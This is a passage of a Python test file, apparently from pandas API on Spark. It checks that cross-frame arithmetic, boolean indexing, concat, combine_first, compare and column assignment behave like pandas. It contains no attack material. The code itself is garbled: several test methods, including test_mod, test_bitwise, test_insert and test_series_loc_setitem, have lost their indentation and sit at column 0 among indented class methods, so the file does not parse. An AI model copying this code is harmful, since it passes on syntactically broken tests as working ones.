                    [249.0, np.nan, 0.0, 0.88, np.nan, np.nan, np.nan, np.nan, np.nan, -np.inf]
                    + [np.nan, np.nan, np.nan, np.nan, np.nan, np.nan, np.nan],
                    index=pd.MultiIndex(
                        [
                            ["cow", "falcon", "koala", "koalas", "lama"],
                            ["length", "power", "speed", "weight"],
                        ],
                        [
                            [0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 2, 3, 3, 3, 4, 4, 4],
                            [0, 1, 2, 2, 3, 0, 0, 1, 2, 3, 0, 0, 3, 3, 0, 2, 3],
                        ],
                    ),
                )
                self.assert_eq((psser1 - psser2 / psser3).sort_index(), expected)
        else:
            assert_eq((psser1 - psser2 / psser3).sort_index(), (pser1 - pser2 / pser3).sort_index())
        assert_eq((psser1 + psser2 * psser3).sort_index(), (pser1 + pser2 * pser3).sort_index())
def test_mod(self):
pser = pd.Series([100, None, -300, None, 500, -700])
pser_other = pd.Series([-150] * 6)
psser = ps.from_pandas(pser)
psser_other = ps.from_pandas(pser_other)
self.assert_eq(psser.mod(psser_other).sort_index(), pser.mod(pser_other))
self.assert_eq(psser.mod(psser_other).sort_index(), pser.mod(pser_other))
self.assert_eq(psser.mod(psser_other).sort_index(), pser.mod(pser_other))
def test_rmod(self):
pser = pd.Series([100, None, -300, None, 500, -700])
pser_other = pd.Series([-150] * 6)
psser = ps.from_pandas(pser)
psser_other = ps.from_pandas(pser_other)
self.assert_eq(psser.rmod(psser_other).sort_index(), pser.rmod(pser_other))
self.assert_eq(psser.rmod(psser_other).sort_index(), pser.rmod(pser_other))
self.assert_eq(psser.rmod(psser_other).sort_index(), pser.rmod(pser_other))
def test_getitem_boolean_series(self):
pdf1 = pd.DataFrame(
{"A": [0, 1, 2, 3, 4], "B": [100, 200, 300, 400, 500]}, index=[20, 10, 30, 0, 50]
)
pdf2 = pd.DataFrame(
{"A": [0, -1, -2, -3, -4], "B": [-100, -200, -300, -400, -500]},
index=[0, 30, 10, 20, 50],
)
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
self.assert_eq(pdf1[pdf2.A > -3].sort_index(), psdf1[psdf2.A > -3].sort_index())
self.assert_eq(pdf1.A[pdf2.A > -3].sort_index(), psdf1.A[psdf2.A > -3].sort_index())
self.assert_eq(
(pdf1.A + 1)[pdf2.A > -3].sort_index(), (psdf1.A + 1)[psdf2.A > -3].sort_index()
)
def test_loc_getitem_boolean_series(self):
pdf1 = pd.DataFrame(
{"A": [0, 1, 2, 3, 4], "B": [100, 200, 300, 400, 500]}, index=[20, 10, 30, 0, 50]
)
pdf2 = pd.DataFrame(
{"A": [0, -1, -2, -3, -4], "B": [-100, -200, -300, -400, -500]},
index=[20, 10, 30, 0, 50],
)
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
self.assert_eq(pdf1.loc[pdf2.A > -3].sort_index(), psdf1.loc[psdf2.A > -3].sort_index())
self.assert_eq(pdf1.A.loc[pdf2.A > -3].sort_index(), psdf1.A.loc[psdf2.A > -3].sort_index())
self.assert_eq(
(pdf1.A + 1).loc[pdf2.A > -3].sort_index(), (psdf1.A + 1).loc[psdf2.A > -3].sort_index()
)
def test_bitwise(self):
pser1 = pd.Series([True, False, True, False, np.nan, np.nan, True, False, np.nan])
pser2 = pd.Series([True, False, False, True, True, False, np.nan, np.nan, np.nan])
psser1 = ps.from_pandas(pser1)
psser2 = ps.from_pandas(pser2)
self.assert_eq(pser1 | pser2, (psser1 | psser2).sort_index())
self.assert_eq(pser1 & pser2, (psser1 & psser2).sort_index())
pser1 = pd.Series([True, False, np.nan], index=list("ABC"))
pser2 = pd.Series([False, True, np.nan], index=list("DEF"))
psser1 = ps.from_pandas(pser1)
psser2 = ps.from_pandas(pser2)
self.assert_eq(pser1 | pser2, (psser1 | psser2).sort_index())
self.assert_eq(pser1 & pser2, (psser1 & psser2).sort_index())
    @unittest.skipIf(
        not extension_object_dtypes_available, "pandas extension object dtypes are not available"
    )
    def test_bitwise_extension_dtype(self):
        """``|`` and ``&`` across anchors with the nullable ``boolean`` dtype."""

        def assert_eq(actual, expected):
            # Loose compare + dtype check on pandas [1.1, 1.2.2); exact otherwise.
            if LooseVersion("1.1") <= LooseVersion(pd.__version__) < LooseVersion("1.2.2"):
                self.assert_eq(actual, expected, check_exact=False)
                self.assertTrue(isinstance(actual.dtype, extension_dtypes))
            else:
                self.assert_eq(actual, expected)

        pser1 = pd.Series(
            [True, False, True, False, np.nan, np.nan, True, False, np.nan], dtype="boolean"
        )
        pser2 = pd.Series(
            [True, False, False, True, True, False, np.nan, np.nan, np.nan], dtype="boolean"
        )
        psser1 = ps.from_pandas(pser1)
        psser2 = ps.from_pandas(pser2)
        assert_eq((psser1 | psser2).sort_index(), pser1 | pser2)
        assert_eq((psser1 & psser2).sort_index(), pser1 & pser2)

        # Disjoint indexes: expectations are spelled out explicitly since the
        # combined result is all-missing on one side per label.
        pser1 = pd.Series([True, False, np.nan], index=list("ABC"), dtype="boolean")
        pser2 = pd.Series([False, True, np.nan], index=list("DEF"), dtype="boolean")
        psser1 = ps.from_pandas(pser1)
        psser2 = ps.from_pandas(pser2)
        assert_eq(
            (psser1 | psser2).sort_index(),
            pd.Series([True, None, None, None, True, None], index=list("ABCDEF"), dtype="boolean"),
        )
        assert_eq(
            (psser1 & psser2).sort_index(),
            pd.Series(
                [None, False, None, False, None, None], index=list("ABCDEF"), dtype="boolean"
            ),
        )
    def test_concat_column_axis(self):
        """``ps.concat(axis=1)`` over frames/Series from different anchors matches pandas.

        Covers flat and MultiIndex columns, every (ignore_index, join)
        combination, and both argument orders for the partially-overlapping pair.
        """
        pdf1 = pd.DataFrame({"A": [0, 2, 4], "B": [1, 3, 5]}, index=[1, 2, 3])
        pdf1.columns.names = ["AB"]
        pdf2 = pd.DataFrame({"C": [1, 2, 3], "D": [4, 5, 6]}, index=[1, 3, 5])
        pdf2.columns.names = ["CD"]
        psdf1 = ps.from_pandas(pdf1)
        psdf2 = ps.from_pandas(pdf2)
        # pdf3/pdf4 are copies of pdf1/pdf2 re-labeled with MultiIndex columns.
        psdf3 = psdf1.copy()
        psdf4 = psdf2.copy()
        pdf3 = pdf1.copy()
        pdf4 = pdf2.copy()
        columns = pd.MultiIndex.from_tuples([("X", "A"), ("X", "B")], names=["X", "AB"])
        pdf3.columns = columns
        psdf3.columns = columns
        columns = pd.MultiIndex.from_tuples([("X", "C"), ("X", "D")], names=["Y", "CD"])
        pdf4.columns = columns
        psdf4.columns = columns
        pdf5 = pd.DataFrame({"A": [0, 2, 4], "B": [1, 3, 5]}, index=[1, 2, 3])
        pdf6 = pd.DataFrame({"C": [1, 2, 3]}, index=[1, 3, 5])
        psdf5 = ps.from_pandas(pdf5)
        psdf6 = ps.from_pandas(pdf6)
        ignore_indexes = [True, False]
        joins = ["inner", "outer"]
        objs = [
            ([psdf1.A, psdf2.C], [pdf1.A, pdf2.C]),
            ([psdf1.A, psdf2], [pdf1.A, pdf2]),
            # NOTE(review): this entry duplicates the first one exactly —
            # possibly a different combination (e.g. frame + Series) was
            # intended; confirm against upstream history.
            ([psdf1.A, psdf2.C], [pdf1.A, pdf2.C]),
            ([psdf3[("X", "A")], psdf4[("X", "C")]], [pdf3[("X", "A")], pdf4[("X", "C")]]),
            ([psdf3, psdf4[("X", "C")]], [pdf3, pdf4[("X", "C")]]),
            ([psdf3[("X", "A")], psdf4], [pdf3[("X", "A")], pdf4]),
            ([psdf3, psdf4], [pdf3, pdf4]),
            ([psdf5, psdf6], [pdf5, pdf6]),
            ([psdf6, psdf5], [pdf6, pdf5]),
        ]
        for ignore_index, join in product(ignore_indexes, joins):
            for i, (psdfs, pdfs) in enumerate(objs):
                with self.subTest(ignore_index=ignore_index, join=join, pdfs=pdfs, pair=i):
                    actual = ps.concat(psdfs, axis=1, ignore_index=ignore_index, join=join)
                    expected = pd.concat(pdfs, axis=1, ignore_index=ignore_index, join=join)
                    # Row order is not guaranteed, so compare the repr of a
                    # canonically sorted, re-indexed result.
                    self.assert_eq(
                        repr(actual.sort_values(list(actual.columns)).reset_index(drop=True)),
                        repr(expected.sort_values(list(expected.columns)).reset_index(drop=True)),
                    )
    def test_combine_first(self):
        """``combine_first`` across different anchors matches pandas.

        Covers Series (flat, tuple-named, MultiIndexed) and DataFrames (flat
        and MultiIndex columns). Pre-1.2.0 pandas results differ, so explicit
        expected frames are used on those versions.
        """
        pser1 = pd.Series({"falcon": 330.0, "eagle": 160.0})
        pser2 = pd.Series({"falcon": 345.0, "eagle": 200.0, "duck": 30.0})
        psser1 = ps.from_pandas(pser1)
        psser2 = ps.from_pandas(pser2)
        self.assert_eq(
            psser1.combine_first(psser2).sort_index(), pser1.combine_first(pser2).sort_index()
        )
        with self.assertRaisesRegex(
            TypeError, "`combine_first` only allows `Series` for parameter `other`"
        ):
            psser1.combine_first(50)

        # Tuple names on both Series.
        psser1.name = ("X", "A")
        psser2.name = ("Y", "B")
        pser1.name = ("X", "A")
        pser2.name = ("Y", "B")
        self.assert_eq(
            psser1.combine_first(psser2).sort_index(), pser1.combine_first(pser2).sort_index()
        )

        # MultiIndexed Series with partially-overlapping indexes.
        midx1 = pd.MultiIndex(
            [["lama", "cow", "falcon", "koala"], ["speed", "weight", "length", "power"]],
            [[0, 3, 1, 1, 1, 2, 2, 2], [0, 2, 0, 3, 2, 0, 1, 3]],
        )
        midx2 = pd.MultiIndex(
            [["lama", "cow", "falcon"], ["speed", "weight", "length"]],
            [[0, 0, 0, 1, 1, 1, 2, 2, 2], [0, 1, 2, 0, 1, 2, 0, 1, 2]],
        )
        pser1 = pd.Series([45, 200, 1.2, 30, 250, 1.5, 320, 1], index=midx1)
        pser2 = pd.Series([-45, 200, -1.2, 30, -250, 1.5, 320, 1, -0.3], index=midx2)
        psser1 = ps.from_pandas(pser1)
        psser2 = ps.from_pandas(pser2)
        self.assert_eq(
            psser1.combine_first(psser2).sort_index(), pser1.combine_first(pser2).sort_index()
        )

        # DataFrames with partially-overlapping columns.
        pdf1 = pd.DataFrame({"A": [None, 0], "B": [4, None]})
        psdf1 = ps.from_pandas(pdf1)
        pdf2 = pd.DataFrame({"C": [3, 3], "B": [1, 1]})
        psdf2 = ps.from_pandas(pdf2)
        if LooseVersion(pd.__version__) >= LooseVersion("1.2.0"):
            self.assert_eq(pdf1.combine_first(pdf2), psdf1.combine_first(psdf2).sort_index())
        else:
            expected_pdf = pd.DataFrame({"A": [None, 0], "B": [4.0, 1.0], "C": [3, 3]})
            self.assert_eq(expected_pdf, psdf1.combine_first(psdf2).sort_index())

        # Same frames with MultiIndex columns.
        pdf1.columns = pd.MultiIndex.from_tuples([("A", "willow"), ("B", "pine")])
        psdf1 = ps.from_pandas(pdf1)
        pdf2.columns = pd.MultiIndex.from_tuples([("C", "oak"), ("B", "pine")])
        psdf2 = ps.from_pandas(pdf2)
        if LooseVersion(pd.__version__) >= LooseVersion("1.2.0"):
            self.assert_eq(pdf1.combine_first(pdf2), psdf1.combine_first(psdf2).sort_index())
        else:
            expected_pdf = pd.DataFrame({"A": [None, 0], "B": [4.0, 1.0], "C": [3, 3]})
            expected_pdf.columns = pd.MultiIndex.from_tuples(
                [("A", "willow"), ("B", "pine"), ("C", "oak")]
            )
            self.assert_eq(expected_pdf, psdf1.combine_first(psdf2).sort_index())
def test_insert(self):
pdf = pd.DataFrame([1, 2, 3])
psdf = ps.from_pandas(pdf)
pser = pd.Series([4, 5, 6])
psser = ps.from_pandas(pser)
psdf.insert(1, "y", psser)
pdf.insert(1, "y", pser)
self.assert_eq(psdf.sort_index(), pdf.sort_index())
#
pdf = pd.DataFrame([1, 2, 3], index=[10, 20, 30])
psdf = ps.from_pandas(pdf)
pser = pd.Series([4, 5, 6])
psser = ps.from_pandas(pser)
psdf.insert(1, "y", psser)
pdf.insert(1, "y", pser)
self.assert_eq(psdf.sort_index(), pdf.sort_index())
#
# DataFrame with Multi-index columns
#
pdf = pd.DataFrame({("x", "a"): [1, 2, 3]})
psdf = ps.from_pandas(pdf)
pser = pd.Series([4, 5, 6])
psser = ps.from_pandas(pser)
pdf = pd.DataFrame({("x", "a", "b"): [1, 2, 3]})
psdf = ps.from_pandas(pdf)
psdf.insert(0, "a", psser)
pdf.insert(0, "a", pser)
self.assert_eq(psdf.sort_index(), pdf.sort_index())
psdf.insert(0, ("b", "c", ""), psser)
pdf.insert(0, ("b", "c", ""), pser)
self.assert_eq(psdf.sort_index(), pdf.sort_index())
    def test_compare(self):
        """``Series.compare`` across anchors.

        On pandas >= 1.1 the result is checked against pandas directly; on
        older pandas (which lacks ``Series.compare``) explicit expected frames
        are used. Also checks that differently-labeled Series are rejected.
        """
        if LooseVersion(pd.__version__) >= LooseVersion("1.1"):
            pser1 = pd.Series(["b", "c", np.nan, "g", np.nan])
            pser2 = pd.Series(["a", "c", np.nan, np.nan, "h"])
            psser1 = ps.from_pandas(pser1)
            psser2 = ps.from_pandas(pser2)
            self.assert_eq(
                pser1.compare(pser2).sort_index(),
                psser1.compare(psser2).sort_index(),
            )
            # `keep_shape=True`
            self.assert_eq(
                pser1.compare(pser2, keep_shape=True).sort_index(),
                psser1.compare(psser2, keep_shape=True).sort_index(),
            )
            # `keep_equal=True`
            self.assert_eq(
                pser1.compare(pser2, keep_equal=True).sort_index(),
                psser1.compare(psser2, keep_equal=True).sort_index(),
            )
            # `keep_shape=True` and `keep_equal=True`
            self.assert_eq(
                pser1.compare(pser2, keep_shape=True, keep_equal=True).sort_index(),
                psser1.compare(psser2, keep_shape=True, keep_equal=True).sort_index(),
            )
            # MultiIndex
            pser1.index = pd.MultiIndex.from_tuples(
                [("a", "x"), ("b", "y"), ("c", "z"), ("x", "k"), ("q", "l")]
            )
            pser2.index = pd.MultiIndex.from_tuples(
                [("a", "x"), ("b", "y"), ("c", "z"), ("x", "k"), ("q", "l")]
            )
            psser1 = ps.from_pandas(pser1)
            psser2 = ps.from_pandas(pser2)
            self.assert_eq(
                pser1.compare(pser2).sort_index(),
                psser1.compare(psser2).sort_index(),
            )
            # `keep_shape=True` with MultiIndex
            self.assert_eq(
                pser1.compare(pser2, keep_shape=True).sort_index(),
                psser1.compare(psser2, keep_shape=True).sort_index(),
            )
            # `keep_equal=True` with MultiIndex
            self.assert_eq(
                pser1.compare(pser2, keep_equal=True).sort_index(),
                psser1.compare(psser2, keep_equal=True).sort_index(),
            )
            # `keep_shape=True` and `keep_equal=True` with MultiIndex
            self.assert_eq(
                pser1.compare(pser2, keep_shape=True, keep_equal=True).sort_index(),
                psser1.compare(psser2, keep_shape=True, keep_equal=True).sort_index(),
            )
        else:
            psser1 = ps.Series(["b", "c", np.nan, "g", np.nan])
            psser2 = ps.Series(["a", "c", np.nan, np.nan, "h"])
            expected = ps.DataFrame(
                [["b", "a"], ["g", None], [None, "h"]], index=[0, 3, 4], columns=["self", "other"]
            )
            self.assert_eq(expected, psser1.compare(psser2).sort_index())
            # `keep_shape=True`
            expected = ps.DataFrame(
                [["b", "a"], [None, None], [None, None], ["g", None], [None, "h"]],
                index=[0, 1, 2, 3, 4],
                columns=["self", "other"],
            )
            self.assert_eq(
                expected,
                psser1.compare(psser2, keep_shape=True).sort_index(),
            )
            # `keep_equal=True`
            expected = ps.DataFrame(
                [["b", "a"], ["g", None], [None, "h"]], index=[0, 3, 4], columns=["self", "other"]
            )
            self.assert_eq(
                expected,
                psser1.compare(psser2, keep_equal=True).sort_index(),
            )
            # `keep_shape=True` and `keep_equal=True`
            expected = ps.DataFrame(
                [["b", "a"], ["c", "c"], [None, None], ["g", None], [None, "h"]],
                index=[0, 1, 2, 3, 4],
                columns=["self", "other"],
            )
            self.assert_eq(
                expected,
                psser1.compare(psser2, keep_shape=True, keep_equal=True).sort_index(),
            )
            # MultiIndex
            psser1 = ps.Series(
                ["b", "c", np.nan, "g", np.nan],
                index=pd.MultiIndex.from_tuples(
                    [("a", "x"), ("b", "y"), ("c", "z"), ("x", "k"), ("q", "l")]
                ),
            )
            psser2 = ps.Series(
                ["a", "c", np.nan, np.nan, "h"],
                index=pd.MultiIndex.from_tuples(
                    [("a", "x"), ("b", "y"), ("c", "z"), ("x", "k"), ("q", "l")]
                ),
            )
            expected = ps.DataFrame(
                [["b", "a"], [None, "h"], ["g", None]],
                index=pd.MultiIndex.from_tuples([("a", "x"), ("q", "l"), ("x", "k")]),
                columns=["self", "other"],
            )
            self.assert_eq(expected, psser1.compare(psser2).sort_index())
            # `keep_shape=True`
            expected = ps.DataFrame(
                [["b", "a"], [None, None], [None, None], [None, "h"], ["g", None]],
                index=pd.MultiIndex.from_tuples(
                    [("a", "x"), ("b", "y"), ("c", "z"), ("q", "l"), ("x", "k")]
                ),
                columns=["self", "other"],
            )
            self.assert_eq(
                expected,
                psser1.compare(psser2, keep_shape=True).sort_index(),
            )
            # `keep_equal=True`
            expected = ps.DataFrame(
                [["b", "a"], [None, "h"], ["g", None]],
                index=pd.MultiIndex.from_tuples([("a", "x"), ("q", "l"), ("x", "k")]),
                columns=["self", "other"],
            )
            self.assert_eq(
                expected,
                psser1.compare(psser2, keep_equal=True).sort_index(),
            )
            # `keep_shape=True` and `keep_equal=True`
            expected = ps.DataFrame(
                [["b", "a"], ["c", "c"], [None, None], [None, "h"], ["g", None]],
                index=pd.MultiIndex.from_tuples(
                    [("a", "x"), ("b", "y"), ("c", "z"), ("q", "l"), ("x", "k")]
                ),
                columns=["self", "other"],
            )
            self.assert_eq(
                expected,
                psser1.compare(psser2, keep_shape=True, keep_equal=True).sort_index(),
            )
        # Different Index
        with self.assertRaisesRegex(
            ValueError, "Can only compare identically-labeled Series objects"
        ):
            psser1 = ps.Series(
                [1, 2, 3, 4, 5],
                index=pd.Index([1, 2, 3, 4, 5]),
            )
            psser2 = ps.Series(
                [2, 2, 3, 4, 1],
                index=pd.Index([5, 4, 3, 2, 1]),
            )
            psser1.compare(psser2)
        # Different MultiIndex
        with self.assertRaisesRegex(
            ValueError, "Can only compare identically-labeled Series objects"
        ):
            psser1 = ps.Series(
                [1, 2, 3, 4, 5],
                index=pd.MultiIndex.from_tuples(
                    [("a", "x"), ("b", "y"), ("c", "z"), ("x", "k"), ("q", "l")]
                ),
            )
            psser2 = ps.Series(
                [2, 2, 3, 4, 1],
                index=pd.MultiIndex.from_tuples(
                    [("a", "x"), ("b", "y"), ("c", "a"), ("x", "k"), ("q", "l")]
                ),
            )
            psser1.compare(psser2)
    def test_different_columns(self):
        """Adding frames with disjoint columns matches pandas (all-NaN union result)."""
        psdf1 = self.psdf1
        psdf4 = self.psdf4
        pdf1 = self.pdf1
        pdf4 = self.pdf4
        self.assert_eq((psdf1 + psdf4).sort_index(), (pdf1 + pdf4).sort_index(), almost=True)

        # Multi-index columns
        columns = pd.MultiIndex.from_tuples([("x", "a"), ("x", "b")])
        psdf1.columns = columns
        pdf1.columns = columns
        columns = pd.MultiIndex.from_tuples([("z", "e"), ("z", "f")])
        psdf4.columns = columns
        pdf4.columns = columns
        self.assert_eq((psdf1 + psdf4).sort_index(), (pdf1 + pdf4).sort_index(), almost=True)
    def test_assignment_series(self):
        """Column assignment from a Series anchored to a different frame.

        Also asserts that Series handles taken *before* the assignment
        (``psser``/``pser``) are not mutated by it.
        """
        psdf = ps.from_pandas(self.pdf1)
        pdf = self.pdf1
        psser = psdf.a
        pser = pdf.a
        psdf["a"] = self.psdf2.a
        pdf["a"] = self.pdf2.a
        self.assert_eq(psdf.sort_index(), pdf.sort_index())
        # Pre-assignment snapshots must be unaffected.
        self.assert_eq(psser, pser)

        # Assign a *different* column of the other frame over "a".
        psdf = ps.from_pandas(self.pdf1)
        pdf = self.pdf1
        psser = psdf.a
        pser = pdf.a
        psdf["a"] = self.psdf2.b
        pdf["a"] = self.pdf2.b
        self.assert_eq(psdf.sort_index(), pdf.sort_index())
        self.assert_eq(psser, pser)

        # Assign into a brand-new column.
        psdf = ps.from_pandas(self.pdf1)
        pdf = self.pdf1
        psdf["c"] = self.psdf2.a
        pdf["c"] = self.pdf2.a
        self.assert_eq(psdf.sort_index(), pdf.sort_index())

        # Multi-index columns
        psdf = ps.from_pandas(self.pdf1)
        pdf = self.pdf1
        columns = pd.MultiIndex.from_tuples([("x", "a"), ("x", "b")])
        psdf.columns = columns
        pdf.columns = columns
        psdf[("y", "c")] = self.psdf2.a
        pdf[("y", "c")] = self.pdf2.a
        self.assert_eq(psdf.sort_index(), pdf.sort_index())

        # Frame whose index column also appears as a data column.
        pdf = pd.DataFrame({"a": [1, 2, 3], "Koalas": [0, 1, 2]}).set_index("Koalas", drop=False)
        psdf = ps.from_pandas(pdf)
        psdf.index.name = None
        psdf["NEW"] = ps.Series([100, 200, 300])
        pdf.index.name = None
        pdf["NEW"] = pd.Series([100, 200, 300])
        self.assert_eq(psdf.sort_index(), pdf.sort_index())
    def test_assignment_frame(self):
        """Multi-column assignment from a DataFrame anchored to a different frame.

        Pre-assignment Series snapshots must stay unchanged, and assignment may
        target existing, partially-existing, or entirely new column labels.
        """
        psdf = ps.from_pandas(self.pdf1)
        pdf = self.pdf1
        psser = psdf.a
        pser = pdf.a
        psdf[["a", "b"]] = self.psdf1
        pdf[["a", "b"]] = self.pdf1
        self.assert_eq(psdf.sort_index(), pdf.sort_index())
        self.assert_eq(psser, pser)

        # 'c' does not exist in `psdf`.
        psdf = ps.from_pandas(self.pdf1)
        pdf = self.pdf1
        psser = psdf.a
        pser = pdf.a
        psdf[["b", "c"]] = self.psdf1
        pdf[["b", "c"]] = self.pdf1
        self.assert_eq(psdf.sort_index(), pdf.sort_index())
        self.assert_eq(psser, pser)

        # 'c' and 'd' do not exist in `psdf`.
        psdf = ps.from_pandas(self.pdf1)
        pdf = self.pdf1
        psdf[["c", "d"]] = self.psdf1
        pdf[["c", "d"]] = self.pdf1
        self.assert_eq(psdf.sort_index(), pdf.sort_index())

        # Multi-index columns
        columns = pd.MultiIndex.from_tuples([("x", "a"), ("x", "b")])
        psdf = ps.from_pandas(self.pdf1)
        pdf = self.pdf1
        psdf.columns = columns
        pdf.columns = columns
        psdf[[("y", "c"), ("z", "d")]] = self.psdf1
        pdf[[("y", "c"), ("z", "d")]] = self.pdf1
        self.assert_eq(psdf.sort_index(), pdf.sort_index())

        # Flat-label assignment from a frame that itself has MultiIndex columns.
        psdf = ps.from_pandas(self.pdf1)
        pdf = self.pdf1
        psdf1 = ps.from_pandas(self.pdf1)
        pdf1 = self.pdf1
        psdf1.columns = columns
        pdf1.columns = columns
        psdf[["c", "d"]] = psdf1
        pdf[["c", "d"]] = pdf1
        self.assert_eq(psdf.sort_index(), pdf.sort_index())
    def test_assignment_series_chain(self):
        """Sequential column assignments from several different anchors compose correctly."""
        psdf = ps.from_pandas(self.pdf1)
        pdf = self.pdf1
        psdf["a"] = self.psdf1.a
        pdf["a"] = self.pdf1.a
        # Overwrite "a" again from a second anchor, then add "d" from a third.
        psdf["a"] = self.psdf2.b
        pdf["a"] = self.pdf2.b
        psdf["d"] = self.psdf3.c
        pdf["d"] = self.pdf3.c
        self.assert_eq(psdf.sort_index(), pdf.sort_index())
    def test_assignment_frame_chain(self):
        """Sequential multi-column assignments from several different anchors."""
        psdf = ps.from_pandas(self.pdf1)
        pdf = self.pdf1
        psdf[["a", "b"]] = self.psdf1
        pdf[["a", "b"]] = self.pdf1
        # Add new columns from one anchor, then overwrite a mix of old and new.
        psdf[["e", "f"]] = self.psdf3
        pdf[["e", "f"]] = self.pdf3
        psdf[["b", "c"]] = self.psdf2
        pdf[["b", "c"]] = self.pdf2
        self.assert_eq(psdf.sort_index(), pdf.sort_index())
    def test_multi_index_arithmetic(self):
        """Arithmetic across anchors whose rows are MultiIndexed (pdf5/pdf6 fixtures)."""
        psdf5 = self.psdf5
        psdf6 = self.psdf6
        pdf5 = self.pdf5
        pdf6 = self.pdf6

        # Series
        self.assert_eq((psdf5.c - psdf6.e).sort_index(), (pdf5.c - pdf6.e).sort_index())
        self.assert_eq((psdf5["c"] / psdf6["e"]).sort_index(), (pdf5["c"] / pdf6["e"]).sort_index())

        # DataFrame
        self.assert_eq((psdf5 + psdf6).sort_index(), (pdf5 + pdf6).sort_index(), almost=True)
    def test_multi_index_assignment_series(self):
        """Column assignment between MultiIndexed frames from different anchors."""
        # New column.
        psdf = ps.from_pandas(self.pdf5)
        pdf = self.pdf5
        psdf["x"] = self.psdf6.e
        pdf["x"] = self.pdf6.e
        self.assert_eq(psdf.sort_index(), pdf.sort_index())

        # New column named after the source column.
        psdf = ps.from_pandas(self.pdf5)
        pdf = self.pdf5
        psdf["e"] = self.psdf6.e
        pdf["e"] = self.pdf6.e
        self.assert_eq(psdf.sort_index(), pdf.sort_index())

        # Overwrite an existing column.
        psdf = ps.from_pandas(self.pdf5)
        pdf = self.pdf5
        psdf["c"] = self.psdf6.e
        pdf["c"] = self.pdf6.e
        self.assert_eq(psdf.sort_index(), pdf.sort_index())
    def test_multi_index_assignment_frame(self):
        """Frame-to-frame assignment between MultiIndexed frames from different anchors."""
        # Overwrite the existing column "c".
        psdf = ps.from_pandas(self.pdf5)
        pdf = self.pdf5
        psdf[["c"]] = self.psdf5
        pdf[["c"]] = self.pdf5
        self.assert_eq(psdf.sort_index(), pdf.sort_index())

        # Assign into a new column label.
        psdf = ps.from_pandas(self.pdf5)
        pdf = self.pdf5
        psdf[["x"]] = self.psdf5
        pdf[["x"]] = self.pdf5
        self.assert_eq(psdf.sort_index(), pdf.sort_index())

        # Assign two new columns from a two-column source.
        psdf = ps.from_pandas(self.pdf6)
        pdf = self.pdf6
        psdf[["x", "y"]] = self.psdf6
        pdf[["x", "y"]] = self.pdf6
        self.assert_eq(psdf.sort_index(), pdf.sort_index())
    def test_frame_loc_setitem(self):
        """``.loc`` assignment using labels/masks/values from a *different* frame.

        Each stanza re-creates fresh copies and takes Series snapshots before
        the assignment; the snapshots are asserted unchanged afterwards.
        """
        pdf_orig = pd.DataFrame(
            [[1, 2], [4, 5], [7, 8]],
            index=["cobra", "viper", "sidewinder"],
            columns=["max_speed", "shield"],
        )
        psdf_orig = ps.DataFrame(pdf_orig)

        # Label-list row selection; value comes from another anchor.
        pdf = pdf_orig.copy()
        psdf = psdf_orig.copy()
        pser1 = pdf.max_speed
        pser2 = pdf.shield
        psser1 = psdf.max_speed
        psser2 = psdf.shield
        another_psdf = ps.DataFrame(pdf_orig)
        psdf.loc[["viper", "sidewinder"], ["shield"]] = -another_psdf.max_speed
        pdf.loc[["viper", "sidewinder"], ["shield"]] = -pdf.max_speed
        self.assert_eq(psdf, pdf)
        self.assert_eq(psser1, pser1)
        self.assert_eq(psser2, pser2)

        # Boolean mask from another anchor; value from the target frame itself.
        pdf = pdf_orig.copy()
        psdf = psdf_orig.copy()
        pser1 = pdf.max_speed
        pser2 = pdf.shield
        psser1 = psdf.max_speed
        psser2 = psdf.shield
        psdf.loc[another_psdf.max_speed < 5, ["shield"]] = -psdf.max_speed
        pdf.loc[pdf.max_speed < 5, ["shield"]] = -pdf.max_speed
        self.assert_eq(psdf, pdf)
        self.assert_eq(psser1, pser1)
        self.assert_eq(psser2, pser2)

        # Both the mask and the value come from another anchor.
        pdf = pdf_orig.copy()
        psdf = psdf_orig.copy()
        pser1 = pdf.max_speed
        pser2 = pdf.shield
        psser1 = psdf.max_speed
        psser2 = psdf.shield
        psdf.loc[another_psdf.max_speed < 5, ["shield"]] = -another_psdf.max_speed
        pdf.loc[pdf.max_speed < 5, ["shield"]] = -pdf.max_speed
        self.assert_eq(psdf, pdf)
        self.assert_eq(psser1, pser1)
        self.assert_eq(psser2, pser2)
    def test_frame_iloc_setitem(self):
        """``DataFrame.iloc`` setitem with a value series anchored to a different frame."""
        pdf = pd.DataFrame(
            [[1, 2], [4, 5], [7, 8]],
            index=["cobra", "viper", "sidewinder"],
            columns=["max_speed", "shield"],
        )
        psdf = ps.DataFrame(pdf)
        another_psdf = ps.DataFrame(pdf)
        # Full-length positional assignment must mirror pandas exactly.
        psdf.iloc[[0, 1, 2], 1] = -another_psdf.max_speed
        pdf.iloc[[0, 1, 2], 1] = -pdf.max_speed
        self.assert_eq(psdf, pdf)
        # A value whose length differs from the indexer is rejected.
        with self.assertRaisesRegex(
            ValueError,
            "shape mismatch",
        ):
            psdf.iloc[[1, 2], [1]] = -another_psdf.max_speed
        # Scaled value, same full-length indexer, still matches pandas.
        psdf.iloc[[0, 1, 2], 1] = 10 * another_psdf.max_speed
        pdf.iloc[[0, 1, 2], 1] = 10 * pdf.max_speed
        self.assert_eq(psdf, pdf)
        # Single-position indexer against a longer value is also a shape mismatch.
        with self.assertRaisesRegex(ValueError, "shape mismatch"):
            psdf.iloc[[0], 1] = 10 * another_psdf.max_speed
def test_series_loc_setitem(self):
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [4, 5, 6]}, index=["cobra", "viper", "sidewinder"])
psdf = ps.from_pandas(pdf)
pser = pdf.x
psery = pdf.y
psser = psdf.x
pssery = psdf.y
pser_another = pd.Series([1, 2, 3], index=["cobra", "viper", "sidewinder"])
psser_another = ps.from_pandas(pser_another)
psser.loc[psser % 2 == 1] = -psser_another
pser.loc[pser % 2 == 1] = -pser_another
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [4, 5, 6]}, index=["cobra", "viper", "sidewinder"])
psdf = ps.from_pandas(pdf)
pser = pdf.x
psery = pdf.y
psser = psdf.x
pssery = psdf.y
psser.loc[psser_another % 2 == 1] = -psser
pser.loc[pser_another % 2 == 1] = -pser
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
